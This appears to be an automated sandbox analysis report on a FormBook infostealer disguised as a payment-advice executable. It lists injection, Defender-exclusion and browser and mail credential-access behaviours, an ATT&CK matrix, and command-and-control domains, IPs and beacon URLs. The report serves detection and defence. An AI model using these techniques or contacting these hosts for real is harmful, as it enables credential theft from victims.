                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                11
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571277 Sample: Payment Advice - Advice Ref... Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 35 www.sssvip2.shop 2->35 37 www.hsa.world 2->37 39 10 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 7 other signatures 2->53 10 Payment Advice - Advice RefA2dGOv46MCnu -USD  Priority payment.exe 4 2->10         started        signatures3 process4 file5 33 Payment Advice - A...ity payment.exe.log, ASCII 10->33 dropped 65 Adds a directory exclusion to Windows Defender 10->65 67 Injects a PE file into a foreign processes 10->67 14 Payment Advice - Advice RefA2dGOv46MCnu -USD  Priority payment.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 vTCmFjyxUmdTJX.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 conhost.exe 17->22         started        process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 24 finger.exe 13 19->24         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 24->57 59 Tries to harvest and steal browser information (history, passwords, etc) 24->59 61 Modifies the context of a thread in another process (thread injection) 24->61 63 3 other signatures 24->63 27 vTCmFjyxUmdTJX.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 dutchdubliners.online 37.97.254.27, 49889, 49895, 49901 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands 27->41 43 www.allstary.top 199.193.6.134, 49928, 49934, 49941 NAMECHEAP-NETUS United States 27->43 45 6 other IPs or domains 27->45 69 Found direct / indirect Syscall (likely to bypass EDR) 27->69 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe66%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe39%VirustotalBrowse
                Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.dutchdubliners.online/7ujc/0%Avira URL Cloudsafe
                http://www.emirates-visa.net/6wmy/0%Avira URL Cloudsafe
                http://www.hsa.world/09b7/?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX80%Avira URL Cloudsafe
                https://www.transip.eu/knowledgebase/zoeken/0%Avira URL Cloudsafe
                http://www.emirates-visa.net0%Avira URL Cloudsafe
                http://comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM0%Avira URL Cloudsafe
                http://www.allstary.top/rdvg/0%Avira URL Cloudsafe
                https://www.transip.eu/question/110000577/0%Avira URL Cloudsafe
                https://www.transip.eu/knowledgebase/entry/5885/0%Avira URL Cloudsafe
                https://www.transip.eu/services/search-domains/0%Avira URL Cloudsafe
                http://www.hsa.world/09b7/0%Avira URL Cloudsafe
                http://www.allstary.top/rdvg/?q0C=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&0vE=z2LXL2HhYNX80%Avira URL Cloudsafe
                https://www.transip.eu/question/1000002300%Avira URL Cloudsafe
                http://www.sssvip2.shop/6t0f/0%Avira URL Cloudsafe
                http://www.jgkgf.club/tvkp/?q0C=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&0vE=z2LXL2HhYNX80%Avira URL Cloudsafe
                https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/0%Avira URL Cloudsafe
                http://www.16v9tiu00r.ink/ah82/?q0C=ZJEy2f+tUkBEF+w+scawLBB5zJTblKgdMgFXComG0qR9kHSC6PuhPC8uHAjvWDylpvj6Mcz0IvFDuxOLTDxJzlfpwwLacPhih5HaTILNLTJtkK4jcOiAtOE=&0vE=z2LXL2HhYNX80%Avira URL Cloudsafe
                http://www.comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=0%Avira URL Cloudsafe
                http://www.comect.online/hmf8/0%Avira URL Cloudsafe
                http://www.dutchdubliners.online/7ujc/?q0C=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&0vE=z2LXL2HhYNX80%Avira URL Cloudsafe
                https://www.transip.eu/privacy-policy/0%Avira URL Cloudsafe
                http://www.16v9tiu00r.ink/ah82/0%Avira URL Cloudsafe
                http://www.sssvip2.shop/6t0f/?q0C=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&0vE=z2LXL2HhYNX80%Avira URL Cloudsafe
                https://www.transip.eu/terms-of-service/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                emirates-visa.net
                3.33.130.190
                truefalse
                  unknown
                  www.comect.online
                  124.6.61.130
                  truetrue
                    unknown
                    www.allstary.top
                    199.193.6.134
                    truetrue
                      unknown
                      ccchhua889911.222tt.icu
                      172.247.112.164
                      truetrue
                        unknown
                        www.sssvip2.shop
                        156.253.8.115
                        truetrue
                          unknown
                          www.hsa.world
                          13.248.169.48
                          truetrue
                            unknown
                            hx2.vip.84dns.com
                            149.104.34.134
                            truetrue
                              unknown
                              dutchdubliners.online
                              37.97.254.27
                              truetrue
                                unknown
                                www.16v9tiu00r.ink
                                unknown
                                unknownfalse
                                  unknown
                                  www.dutchdubliners.online
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.jgkgf.club
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.emirates-visa.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.hsa.world/09b7/?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX8true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.dutchdubliners.online/7ujc/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.emirates-visa.net/6wmy/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.allstary.top/rdvg/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.hsa.world/09b7/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jgkgf.club/tvkp/?q0C=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&0vE=z2LXL2HhYNX8true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.allstary.top/rdvg/?q0C=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&0vE=z2LXL2HhYNX8true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sssvip2.shop/6t0f/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.comect.online/hmf8/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.16v9tiu00r.ink/ah82/?q0C=ZJEy2f+tUkBEF+w+scawLBB5zJTblKgdMgFXComG0qR9kHSC6PuhPC8uHAjvWDylpvj6Mcz0IvFDuxOLTDxJzlfpwwLacPhih5HaTILNLTJtkK4jcOiAtOE=&0vE=z2LXL2HhYNX8true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.dutchdubliners.online/7ujc/?q0C=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&0vE=z2LXL2HhYNX8true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sssvip2.shop/6t0f/?q0C=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&0vE=z2LXL2HhYNX8true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.16v9tiu00r.ink/ah82/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabfinger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designersGPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers/?Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cn/bThePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers?Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.transip.eu/knowledgebase/zoeken/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.transip.eu/services/search-domains/vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tiro.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.transip.nl/services/search-domains/vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          https://www.transip.nl/vragen/110000534/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designersPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://transip.nl/vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                http://www.goodfont.co.krPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.sajatypeworks.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.typography.netDPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/cThePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/staff/dennis.htmPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://nl.trustpilot.com/review/www.transip.nlfinger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.transip.eu/question/110000577/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://transip.nl/cp/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfinger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.transip.nl/algemene-voorwaarden/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.emirates-visa.netvTCmFjyxUmdTJX.exe, 0000000A.00000002.3552365141.000000000153E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.galapagosdesign.com/DPleasePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.transip.nl/vragen/198/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfMfinger.exe, 00000009.00000002.3553337559.0000000004D40000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.00000000042D0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
